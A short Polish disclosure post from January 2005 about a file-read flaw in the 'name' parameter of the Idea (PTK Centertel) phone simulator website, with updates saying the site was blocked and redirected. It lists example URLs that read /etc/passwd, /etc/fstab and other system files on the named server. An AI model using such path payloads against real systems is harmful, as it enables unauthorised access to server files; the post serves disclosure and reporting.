Idea udostępnia pliki konfiguracyjne swojego serwera

Oferowany przez firmę PTK Centertel symulator telefonów – symulator.idea.pl – posiada błąd pozwalający na edycję plików konfiguracyjnych serwera. Dzięki temu przy użyciu przeglądarki stron www możemy odczytać zawartość plików zawierających nazwy dysków i partycji czy też konfiguracyjnych powłokę BASH. Nie jest też problemem wyedytowanie głównego pliku startowego systemu zawierającego listę terminali czy też pliku /etc/passwd.

Podczas uruchamiania symulatora danego telefonu w adresie przekazywana
jest zmienna „name”, np. http://symulator.idea.pl/phone.php?name=nokia9210.html (wartość zmiennej: nokia9210.html), powoduje to wyświetlenie zawartości pliku nokia9210.html.

W ten sam sposób można odczytać dowolny plik znajdujący się na serwerze, m.in:

http://symulator.idea.pl/phone.php?name=/etc/passwd (mirror)

http://symulator.idea.pl/phone.php?name=/etc/fstab (mirror)

http://symulator.idea.pl/phone.php?name=/etc/hosts (mirror)

http://symulator.idea.pl/phone.php?name=/etc/inittab (mirror)

http://symulator.idea.pl/phone.php?name=/etc/profile (mirror)
update (03.01.05 09:55)

Skrypt edytujący został zablokowany w skutek czego nie jest możliwe korzystanie z serwisu symulator.idea.pl – przeglądanie informacji dotyczących telefonów jest nieaktywne.

Efekty wykorzystania błędu zostały zarchiwizowane. Sprawdź mirrory linków.

update (04.01.05)
Adres symulator.idea.pl został przekierowany na www.idea.pl

Zobacz również: Błędy na stronie Idea24On-Line